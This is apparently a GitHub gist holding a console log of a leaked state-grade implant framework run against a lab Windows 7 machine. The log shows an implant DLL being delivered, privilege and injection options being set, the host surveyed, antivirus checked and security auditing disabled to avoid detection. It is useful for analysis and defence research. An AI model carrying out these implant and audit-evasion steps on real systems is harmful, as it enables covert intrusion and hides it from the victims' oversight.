Created
          April 15, 2017 23:06 
        
      - 
      
- 
        Save misterch0c/d75509a699ec1f518b6978ab0968af54 to your computer and use it in GitHub Desktop. 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | [22:59:16] ID: 1125 'pc_listen' started [target: z0.0.0.1] | |
| Waiting for connection... | |
| Setting Sockopt | |
| Listening on [0.0.0.0]:443. | |
| Setting Sockopt | |
| Listening on [0.0.0.0]:80. | |
| Setting Sockopt | |
| Listening on [0.0.0.0]:53. | |
| Setting Sockopt | |
| Listening on [0.0.0.0]:1509. | |
| Connection received from [192.168.0.249]:49356 to [192.168.0.118]:443... | |
| Connection accepted | |
| Starting session... | |
| PC LP Version: 2.3.0 | |
| LP...ready to send the MAGIC NUMBER | |
| Sending additional 358 bytes of random | |
| LP ...ready to receive the symmetric key | |
| LP...ready to decrypt the key | |
| Remote Information | |
| PC Version : 2.3.0 | |
| PC Id : 0x0000000000000000 | |
| Arch-Os : i386-winnt (compiled i386-winnt) | |
| Session Key : ff 05 c1 bd 97 98 b5 3c 42 8d 73 03 0c c6 0d b3 | |
| Getting remote OS information | |
| Remote OS | |
| Arch : i386 | |
| Compiled Arch : i386 | |
| Platform : winnt | |
| Compiled Platform : winnt | |
| Version : 6.1 (Windows 7) | |
| Service Pack : 1 | |
| C Lib Version : 6.0.0 | |
| Sending OS version check status to remote side (4 bytes) | |
| Data (OS version check status) has been sent | |
| Data (OS version check status) has been received and stored by remote side | |
| Ready to send implant | |
| Successfully loaded LP DLLs | |
| Payload | |
| File Name : D:\DSZOPSDisk\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll | |
| Send payload : true | |
| Original Size : 248832 | |
| Send Size : 137488 | |
| Checksum : c745 | |
| Name : | |
| Path : | |
| Export : #1 | |
| Sending PayloadInfo run type information | |
| Sending File/Library info to remote side (36 bytes) | |
| Data (File/Library info) has been sent | |
| Data (File/Library info) has been received and stored by remote side | |
| Sending Export name to remote side (3 bytes) | |
| Data (Export name) has been sent | |
| Data (Export name) has been received and stored by remote side | |
| Sending Payload to remote side (137488 bytes) | |
| Data (Payload) has been sent | |
| Data (Payload) has been received and stored by remote side | |
| ... Receiving Acknowledgements | |
| Received successful status message for Dll/Exe loaded | |
| Received successful status message for About to run payload | |
| Received successful status message for Exit This Message Loop | |
| Setting remote address to z0.0.0.13 | |
| Remote Address : z0.0.0.13 | |
| Architecture : i386 | |
| Compiled Architecture : i386 | |
| Platform : winnt | |
| Version : 6.1.1 (build 7601) | |
| C Library Version : 6.0.0 | |
| Process Id : 496 | |
| Type : Dsz | |
| Metadata : type=PC local=192.168.0.118:443 remote=192.168.0.249:49356 | |
| - Remote host is i386-winnt (6.1.1) | |
| - -------------------------------------------------- | |
| - Performing setup for i386-winnt on z0.0.0.13 | |
| - -------------------------------------------------- | |
| - PROMPTED - Shutdown (CURRENT) | |
| - Registering Mcl_NtElevation options | |
| - SUCCESS | |
| - Setting Mcl_NtElevation Type | |
| - EpMe_GrSa | |
| - Registering Mcl_NtNativeApi options | |
| - SUCCESS | |
| - Setting Mcl_NtNativeApi Type | |
| - WIN32 | |
| - Registering Mcl_NtMemory options | |
| - SUCCESS | |
| - Setting Mcl_NtMemory Type | |
| - Std | |
| - Registering Mcl_ThreadInject options | |
| - SUCCESS | |
| - Setting Mcl_ThreadInject Type | |
| - Std | |
| Unable to get target DB for unknown target | |
| Able to load audit plugin, NT_ELEVATION loaded correctly, moving on | |
| - Current process options (0xd) | |
| - DisableThunkEmulation | |
| - ExecutionDisabled | |
| - Permanent | |
| Do you want to modify the process options? | |
| NO | |
| - DISABLED - Authentication (CURRENT) | |
| - -------------------------------------------------- | |
| - Getting remote time | |
| - RETRIEVED | |
| - Getting host information | |
| - RETRIEVED | |
| - Getting OS GUID information | |
| - RETRIEVED | |
| - Storing host information | |
| - STORED | |
| - User is ADMINISTRATOR | |
| - | |
| -------------------------------------------------- | |
| Running command 'python Connected/Connected.py -project Ops' | |
| Unable to get target DB for unknown target | |
| - -------------------------------------------------- | |
| - Re-registering global wrappers for current target | |
| - -------------------------------------------------- | |
| - hide - Windows kernel 6.0+ PatchGuard protection | |
| - packetredirect - Trigger failure alerter | |
| - -------------------------------------------------- | |
| Showing you what we know so you can make a good decision in the menu below | |
| crypto_guid: b2520430-4565-417f-b4e8-0668971c30f9 | |
| hostname: victim-PC | |
| macs: [u'08-00-27-bb-ef-c8'] | |
| implant_id: 0x0000000000000000 | |
| Below match threshold or multiple matches. You must choose. Choose wisely. | |
| 0) None of these - create a new target db | |
| 1) (Confidence: 0.8) test / victim-PC / PC ID 0x0000000000000000 / b2520430-4565-417f-b4e8-0668971c30f9 / MACS: ['08-00-27-bb-ef-c8'] | |
| Enter selection: | |
| 1 | |
| - [2017-04-15 16:01:44 z0.0.0.13] Target ID completed, ID 2c37f2f0-55d8-4e56-bbcb-656b9d98c775 (in project test) | |
| - [2017-04-15 16:01:44 z0.0.0.13] You have been on this target previously with the following CP addresses | |
| z0.0.0.12 | |
| z0.0.0.11 | |
| ==================================================================== | |
| - [2017-04-15 16:01:44 z0.0.0.13] Showing ifconfig data so you can make sure you are on the correct target | |
| FQDN: victim-PC | |
| DNS Servers: 195.130.131.1, 195.130.130.1 | |
| - [2017-04-15 16:01:45 z0.0.0.13] Showing all non-local and non-tunnel encapsulation adapter information, see command 1206 for full interface list | |
| | Description | MAC | IP | Netmask | Gateway | DHCP Server | Name | | |
| +--------------------------------------+-------------------+---------------+---------------+---------------------------------+-------------+----------------------------------------------------------------+ | |
| | Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-BB-EF-C8 | 192.168.0.249 | 255.255.255.0 | fe80::de53:7cff:fef2:b96e%%%%11 | 192.168.0.1 | Local Area Connection ({C63B0135-2C21-412E-92E7-A6FEB149081E}) | | |
| Running command 'survey -run D:\DSZOPSDisk\Resources\Ops\Data\survey.xml -sections env-setup -quiet' | |
| Running command 'systemversion ' | |
| Architecture : i386 | |
| OS Family : winnt | |
| Version : 6.1 (Build 7601) | |
| Platform : Windows 7 | |
| Service Pack : 1.0 | |
| Extra Info : Service Pack 1 | |
| Product Type : Workstation / Professional | |
| Terminal Services is installed, but only one interactive session is supported. | |
| Command completed successfully | |
| - [2017-04-15 16:01:48 z0.0.0.13] 1 safety handler registered for AUDIT | |
| - [2017-04-15 16:01:48 z0.0.0.13] 1 safety handler registered for DRIVERS | |
| - [2017-04-15 16:01:48 z0.0.0.13] Loaded safety handlers from previous op(s) | |
| Command completed successfully | |
| Running command 'survey -run' | |
| - [2017-04-15 16:01:50 z0.0.0.13] ================================== Process list ================================================================== | |
| - [2017-04-15 16:01:52 z0.0.0.13] Data age: 01 seconds - data is fresh | |
| - | PID | PPID | Full Path | User | Comment | | |
| - +------+------+--------------------------------------------------+------------------------------+------------------------------------------------------------+ | |
| - | 0 | 0 | | | | | |
| - | 4 | 0 | System | | System Kernel | | |
| - | 232 | 4 | ---\SystemRoot\System32\smss.exe | NT AUTHORITY\SYSTEM | Session Manager Subsystem | | |
| - | 300 | 292 | csrss.exe | | Client-Server Runtime Server Subsystem | | |
| - | 336 | 292 | C:\Windows\system32\wininit.exe | NT AUTHORITY\SYSTEM | Vista background service launcher | | |
| - | 428 | 336 | ---C:\Windows\system32\services.exe | NT AUTHORITY\SYSTEM | Windows Service Controller | | |
| - | 536 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 616 | 428 | ------svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 688 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 760 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 248 | 760 | ---------C:\Windows\system32\Dwm.exe | victim-PC\victim | Vista Desktop Window Manager | | |
| - | 796 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 3772 | 796 | ---------C:\Windows\system32\wuauclt.exe | victim-PC\victim | Microsoft Windows Update | | |
| - | 968 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 1096 | 428 | ------svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 1236 | 428 | ------spoolsv.exe | NT AUTHORITY\SYSTEM | Microsoft Printer Spooler Service | | |
| - | 1264 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 1368 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 276 | 428 | ------C:\Windows\system32\taskhost.exe | victim-PC\victim | Windows 7 Generic Host Process | | |
| - | 2032 | 428 | ------SearchIndexer.exe | NT AUTHORITY\SYSTEM | Microsoft search indexer | | |
| - | 1152 | 428 | ------wmpnetwk.exe | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service | | |
| - | 2132 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 3296 | 428 | ------C:\Program Files\EMET 5.5\EMET_Service.exe | NT AUTHORITY\SYSTEM | | | |
| - | 3424 | 428 | ------sppsvc.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service | | |
| - | 3456 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) | | |
| - | 440 | 336 | ---C:\Windows\system32\lsass.exe | NT AUTHORITY\SYSTEM | Local Security Authority Server Subsystem | | |
| - | 448 | 336 | ---C:\Windows\system32\lsm.exe | NT AUTHORITY\SYSTEM | Vista Local Session Manager | | |
| - | 344 | 328 | csrss.exe | | Client-Server Runtime Server Subsystem | | |
| - | 2448 | 344 | ---C:\Windows\system32\conhost.exe | victim-PC\victim | Microsoft Console Windows Host | | |
| - | 372 | 328 | C:\Windows\system32\winlogon.exe | NT AUTHORITY\SYSTEM | Microsoft Windows Logon Process | | |
| - | 496 | 100 | C:\Windows\Explorer.EXE | victim-PC\victim | Windows Explorer Shell | | |
| - | 296 | 496 | ---C:\Windows\system32\cmd.exe | victim-PC\victim | +++ Windows Command Prompt +++ | | |
| - | 2768 | 496 | ---C:\Windows\system32\taskmgr.exe | victim-PC\victim | +++ Windows Task Manager +++ | | |
| background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor \" " | |
| - [2017-04-15 16:01:53 z0.0.0.13] ===================================== Uptime ===================================================================== | |
| Uptime: -1 days, 10:11:53 | |
| - [2017-04-15 16:01:54 z0.0.0.13] ================== Auditing status check, dorking will be later ================================================== | |
| - [2017-04-15 16:01:54 z0.0.0.13] Data age: 24:58 (from local cache, re-run manually if you need to) | |
| - [2017-04-15 16:01:54 z0.0.0.13] Auditing is enabled on this machine | |
| | Category | Success | Failure | | |
| +-----------------------------------+---------+---------+ | |
| | System_SecurityStateChange | True | False | | |
| | System_Integrity | True | True | | |
| | System_Others | True | True | | |
| | Logon_Logon | True | False | | |
| | Logon_Logoff | True | False | | |
| | Logon_AccountLockout | True | False | | |
| | Logon_SpecialLogon | True | False | | |
| | Logon_NPS | True | True | | |
| | PolicyChange_AuditPolicy | True | False | | |
| | PolicyChange_AuthenticationPolicy | True | False | | |
| | AccountManagement_UserAccount | True | False | | |
| | AccountManagement_SecurityGroup | True | False | | |
| - [2017-04-15 16:01:54 z0.0.0.13] The above is only being shown for informational purposes, you will be prompted about dorking later | |
| - [2017-04-15 16:01:54 z0.0.0.13] =================================== Driver list =================================================================== | |
| Running command 'python D:\DSZOPSDisk\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"' | |
| - | Driver | Path | Flags | Comment | Type | First Seen | Also On | | |
| - +------------------+-----------------------------+----------------+----------------------------------+---------+------------+------------+ | |
| - | dump_dumpata.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC | | |
| - | dump_dumpfve.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC | | |
| - | dump_msahci.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC | | |
| Command completed successfully | |
| - [2017-04-15 16:01:58 z0.0.0.13] =============================== Installed software =============================================================== | |
| - --------------------------------------------------------------- Installer Packages --------------------------------------------------------------- | |
| - [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:50 (from local cache, re-run manually if you need to) | |
| | Arcitecture | Name | Description | Installed version | Date installed | | |
| +-------------+------------------------------+-----------------------+-------------------+----------------+ | |
| | 32-bit | EMET 5.5 | Microsoft Corporation | 5.5 | 2017-04-15 | | |
| | 32-bit | Microsoft .NET Framework 4.5 | Microsoft Corporation | 4.5.50709 | | | |
| | 32-bit | Microsoft .NET Framework 4.5 | Microsoft Corporation | 4.5.50709 | 2017-04-15 | | |
| - ----------------------------------------------------------------- Software key(s) ----------------------------------------------------------------- | |
| - [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:44 (from local cache, re-run manually if you need to) | |
| | Architecture | Name | Last update | | |
| +--------------+------------------------+-------------+ | |
| | 32-bit | ATI Technologies | 2009-07-14 | | |
| | 32-bit | CBSTEST | 2017-04-15 | | |
| | 32-bit | Classes | 2017-04-16 | | |
| | 32-bit | Clients | 2009-07-14 | | |
| | 32-bit | Intel | 2009-07-14 | | |
| | 32-bit | Microsoft | 2017-04-16 | | |
| | 32-bit | ODBC | 2009-07-14 | | |
| | 32-bit | Policies | 2009-07-14 | | |
| | 32-bit | RegisteredApplications | 2011-04-12 | | |
| | 32-bit | RT 7 Lite | 2014-04-19 | | |
| | 32-bit | Sonic | 2011-04-12 | | |
| | 32-bit | WOW6432Node | 2017-04-15 | | |
| - -------------------------------------------------------------- Program files dir(s) -------------------------------------------------------------- | |
| - [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:40 (from local cache, re-run manually if you need to) | |
| | Architecture | Folder Name | Modified | | |
| +--------------+--------------------------+-------------------------------+ | |
| | 32-bit | Common Files | 2009-07-14T02:37:05.485289900 | | |
| | 32-bit | DVD Maker | 2011-04-12T02:24:27.829375000 | | |
| | 32-bit | EMET 5.5 | 2017-04-16T03:24:44.011648000 | | |
| | 32-bit | Internet Explorer | 2011-04-12T02:16:02.751250000 | | |
| | 32-bit | Microsoft Games | 2011-04-12T02:24:27.032500000 | | |
| | 32-bit | Microsoft.NET | 2017-04-16T03:22:03.169296000 | | |
| | 32-bit | MSBuild | 2009-07-14T04:52:30.938524700 | | |
| | 32-bit | Reference Assemblies | 2009-07-14T04:52:30.938524700 | | |
| | 32-bit | Uninstall Information | 2009-07-14T04:53:23.912062200 | | |
| | 32-bit | Windows Defender | 2011-04-12T02:16:02.720000000 | | |
| | 32-bit | Windows Journal | 2011-04-12T02:24:24.860625000 | | |
| | 32-bit | Windows Mail | 2011-04-12T02:16:02.751250000 | | |
| | 32-bit | Windows Media Player | 2011-04-12T02:16:02.735625000 | | |
| | 32-bit | Windows NT | 2009-07-14T04:52:30.954124700 | | |
| | 32-bit | Windows Photo Viewer | 2011-04-12T02:16:02.735625000 | | |
| | 32-bit | Windows Portable Devices | 2010-11-20T21:33:48.579615600 | | |
| | 32-bit | Windows Sidebar | 2011-04-12T02:16:02.782500000 | | |
| z0.0.0.13: [2017-04-15 16:01:58] Hashhunter completed on victim-PC! | |
| - [2017-04-15 16:01:58 z0.0.0.13] ================================ Running services ================================================================ | |
| - [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:38 (from local cache, re-run manually if you need to) | |
| | Display name | Service name | | |
| +--------------------------------------------------+----------------------+ | |
| | Application Experience | AeLookupSvc | | |
| | Application Information | Appinfo | | |
| | Windows Audio Endpoint Builder | AudioEndpointBuilder | | |
| | Windows Audio | Audiosrv | | |
| | Base Filtering Engine | BFE | | |
| | Background Intelligent Transfer Service | BITS | | |
| | Computer Browser | Browser | | |
| | Certificate Propagation | CertPropSvc | | |
| | Cryptographic Services | CryptSvc | | |
| | Offline Files | CscService | | |
| | DCOM Server Process Launcher | DcomLaunch | | |
| | DHCP Client | Dhcp | | |
| | DNS Client | Dnscache | | |
| | Diagnostic Policy Service | DPS | | |
| | Microsoft EMET Service | EMET_Service | | |
| | Windows Event Log | eventlog | | |
| | COM+ Event System | EventSystem | | |
| | Function Discovery Provider Host | fdPHost | | |
| | Function Discovery Resource Publication | FDResPub | | |
| | Windows Font Cache Service | FontCache | | |
| | Group Policy Client | gpsvc | | |
| | HomeGroup Listener | HomeGroupListener | | |
| | HomeGroup Provider | HomeGroupProvider | | |
| | IP Helper | iphlpsvc | | |
| | CNG Key Isolation | KeyIso | | |
| | Server | LanmanServer | | |
| | Workstation | LanmanWorkstation | | |
| | TCP/IP NetBIOS Helper | lmhosts | | |
| | Windows Firewall | MpsSvc | | |
| | Network Connections | Netman | | |
| | Network List Service | netprofm | | |
| | Network Location Awareness | NlaSvc | | |
| | Network Store Interface Service | nsi | | |
| | Peer Networking Identity Manager | p2pimsvc | | |
| | Peer Networking Grouping | p2psvc | | |
| | Plug and Play | PlugPlay | | |
| | Peer Name Resolution Protocol | PNRPsvc | | |
| | Power | Power | | |
| | User Profile Service | ProfSvc | | |
| | RPC Endpoint Mapper | RpcEptMapper | | |
| | Remote Procedure Call (RPC) | RpcSs | | |
| | Security Accounts Manager | SamSs | | |
| | Task Scheduler | Schedule | | |
| | Secondary Logon | seclogon | | |
| | System Event Notification Service | SENS | | |
| | Remote Desktop Configuration | SessionEnv | | |
| | Shell Hardware Detection | ShellHWDetection | | |
| | Print Spooler | Spooler | | |
| | Software Protection | sppsvc | | |
| | SPP Notification Service | sppuinotify | | |
| | SSDP Discovery | SSDPSRV | | |
| | Remote Desktop Services | TermService | | |
| | Themes | Themes | | |
| | Distributed Link Tracking Client | TrkWks | | |
| | Remote Desktop Services UserMode Port Redirector | UmRdpService | | |
| | UPnP Device Host | upnphost | | |
| | Desktop Window Manager Session Manager | UxSms | | |
| | Diagnostic Service Host | WdiServiceHost | | |
| | Windows Defender | WinDefend | | |
| | Windows Management Instrumentation | Winmgmt | | |
| | Windows Media Player Network Sharing Service | WMPNetworkSvc | | |
| | Security Center | wscsvc | | |
| | Windows Search | WSearch | | |
| | Windows Update | wuauserv | | |
| - [2017-04-15 16:01:59 z0.0.0.13] =================================== AV Check!!! =================================================================== | |
| Running command 'python windows\checkpsp.py -project Ops ' | |
| - Checking for any running known PSP's... | |
| - microsoft | |
| - | |
| - Checking for target PSP history... | |
| - Found configuration history for Microsoft. | |
| - Saw PSP's we can act on. Running scripts. | |
| - ============================================ | |
| - = microsoft = | |
| - ============================================ | |
| - Checking for a change in configuration | |
| - The following PSPs had NO changes: | |
| - Microsoft Windows Defender Windows 7 Ultimate | |
| - +--------------------+--------------------+ | |
| - | | Setting Value | | |
| - +--------------------+--------------------+ | |
| - | vendor | Microsoft | | |
| - | product | Windows Defender | | |
| - | version | Windows 7 Ultimate | | |
| - | Definition Updates | None | | |
| - | Information | None | | |
| - | Install Date | None | | |
| - | Log File | None | | |
| - | Quarantine | None | | |
| - | ServiceStart | 2 | | |
| - | Software | PSP | | |
| - | SpyNet | 1 | | |
| - | Status | Enabled | | |
| - +--------------------+--------------------+ | |
| Command completed successfully | |
| - [2017-04-15 16:02:11 z0.0.0.13] ================================ Auditing dorking ================================================================ | |
| - [2017-04-15 16:02:11 z0.0.0.13] Data age: 25:15 (from local cache, re-run manually if you need to) | |
| - [2017-04-15 16:02:11 z0.0.0.13] Auditing is enabled on this machine | |
| | Category | Success | Failure | | |
| +-----------------------------------+---------+---------+ | |
| | System_SecurityStateChange | True | False | | |
| | System_Integrity | True | True | | |
| | System_Others | True | True | | |
| | Logon_Logon | True | False | | |
| | Logon_Logoff | True | False | | |
| | Logon_AccountLockout | True | False | | |
| | Logon_SpecialLogon | True | False | | |
| | Logon_NPS | True | True | | |
| | PolicyChange_AuditPolicy | True | False | | |
| | PolicyChange_AuthenticationPolicy | True | False | | |
| | AccountManagement_UserAccount | True | False | | |
| | AccountManagement_SecurityGroup | True | False | | |
| Do you want to dork security auditing? | |
| YES | |
| - [2017-04-15 16:02:23 z0.0.0.13] Security auditing dorked, do not stop command 1237 or you will lose your blessing | |
| - [2017-04-15 16:02:23 z0.0.0.13] ==================================== Monitors ==================================================================== | |
| Monitors | |
| ----------------------------- | |
| 1) Full - arp, netstat, activity | |
| 2) Netstat and activity | |
| 3) Activity only | |
| 4) Done | |
| Select your monitors (full recommended for most situations): [1] 4 | |
| - [2017-04-15 16:02:32 z0.0.0.13] Process deep started in the background as command ID 1239. | |
| - [2017-04-15 16:02:32 z0.0.0.13] Informational SIG check started in the background as command ID 1240. | |
| - [2017-04-15 16:02:32 z0.0.0.13] ================================ Scheduler survey ================================================================ | |
| - [2017-04-15 16:02:34 z0.0.0.13] Data age: 24:46 (from local cache, re-run manually if you need to) | |
| | source | command | nextrun | triggers | runas | jobname | | |
| +---------+------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------+-----------------------------------------------+-----------------------+------------------------------------------------------------------------------------------------------+ | |
| | SERVICE | COM job ClassID and data: {BF5CB148-7C77-4D8A-A53E-D81C70CF743C} - | LOGON | LOGON | LEAST | Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) | | |
| | SERVICE | aitagent (runs in "") | DAILY 2007-10-08T02:30:00 | DAILY 2007-10-08T02:30:00 | SYSTEM LEAST | Application Experience\AitAgent | | |
| | SERVICE | %%%%windir%%%%\system32\rundll32.exe aepdu.dll,AePduRunUpdate (runs in "") | DAILY 2007-10-08T00:30:00 | DAILY 2007-10-08T00:30:00 | SYSTEM LEAST | Application Experience\ProgramDataUpdater | | |
| | SERVICE | %%%%windir%%%%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations (runs in "") | BOOT | BOOT | LOCAL SERVICE LEAST | Autochk\Proxy | | |
| | SERVICE | BthUdTask.exe $(Arg0) (runs in "") | | | SYSTEM LEAST | Bluetooth\UninstallDeviceTask | | |
| | SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - SYSTEM | EVENT , REGISTRATION , BOOT | EVENT , REGISTRATION , BOOT | SYSTEM LEAST | CertificateServicesClient\SystemTask | | |
| | SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - USER | EVENT , REGISTRATION , LOGON | EVENT , REGISTRATION , LOGON | LEAST | CertificateServicesClient\UserTask | | |
| | SERVICE | %%%%SystemRoot%%%%\System32\wsqmcons.exe (runs in "") | TIME 2004-01-02T00:00:00 | TIME 2004-01-02T00:00:00 | SYSTEM LEAST | Customer Experience Improvement Program\Consolidator | | |
| | SERVICE | COM job ClassID and data: {E7ED314F-2816-4C26-AEB5-54A34D02404C} - | WEEKLY 2008-09-01T03:30:00 | WEEKLY 2008-09-01T03:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\KernelCeipTask | | |
| | SERVICE | COM job ClassID and data: {C27F6B1D-FE0B-45E4-9257-38799FA69BC8} - SYSTEM | DAILY 2008-04-25T01:30:00 | DAILY 2008-04-25T01:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\UsbCeip | | |
| | SERVICE | %%%%windir%%%%\system32\defrag.exe -c (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | SYSTEM HIGHEST | Defrag\ScheduledDefrag | | |
| | SERVICE | COM job ClassID and data: {C1F85EF8-BCC2-4606-BB39-70C523715EB3} - | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | HIGHEST | Diagnosis\Scheduled | | |
| | SERVICE | %%%%windir%%%%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART (runs in "") | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | SYSTEM LEAST | DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector | | |
| | SERVICE | %%%%windir%%%%\System32\LocationNotifications.exe (runs in "") | EVENT | EVENT | LEAST | Location\Notifications | | |
| | SERVICE | COM job ClassID and data: {A9A33436-678B-4C9C-A211-7CC38785E79D} - | WEEKLY 2008-01-01T01:00:00 | WEEKLY 2008-01-01T01:00:00 | HIGHEST | Maintenance\WinSAT | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoActivateWindowsSearch (runs in "") | | | SYSTEM LEAST | Media Center\ActivateWindowsSearch | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (runs in "") | | | SYSTEM LEAST | Media Center\ConfigureInternetTimeService | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\DispatchRecoveryTasks | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DRMInit (runs in "") | | | LOCAL SERVICE LEAST | Media Center\ehDRMInit | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\InstallPlayReady | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate $(Arg0) (runs in "") | | | NETWORK SERVICE LEAST | Media Center\mcupdate | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -MediaCenterRecoveryTask (runs in "") | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask | | |
| | SERVICE | COM job ClassID and data: {23E5D772-327A-42F5-BDEE-C65C6796BB2A} - $(Arg1) | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -ObjectStoreRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask | | |
| | SERVICE | COM job ClassID and data: {177AFECE-9599-46CF-90D7-68EC9EEB27B4} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURActivate (runs in "") | | | SYSTEM LEAST | Media Center\OCURActivate | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\OCURDiscovery | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscovery | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW1 | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW2 | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask | | |
| | SERVICE | COM job ClassID and data: {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrSchedule (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask | | |
| | SERVICE | COM job ClassID and data: {CEF51277-5358-477B-858C-4E14F0C80BF7} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\RegisterSearch | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoReindexSearchRoot (runs in "") | | | SYSTEM LEAST | Media Center\ReindexSearchRoot | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -SqlLiteRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask | | |
| | SERVICE | COM job ClassID and data: {59116E30-02BD-4B84-BA1E-5D77E809B1A2} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask | | |
| | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\UpdateRecordPath | | |
| | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - PageNotZero | EVENT | EVENT | LEAST | MemoryDiagnostic\CorruptionDetector | | |
| | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - Decompression | EVENT | EVENT | LEAST | MemoryDiagnostic\DecompressionFailureDetector | | |
| | SERVICE | COM job ClassID and data: {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - | LOGON | LOGON | LEAST | MobilePC\HotStart | | |
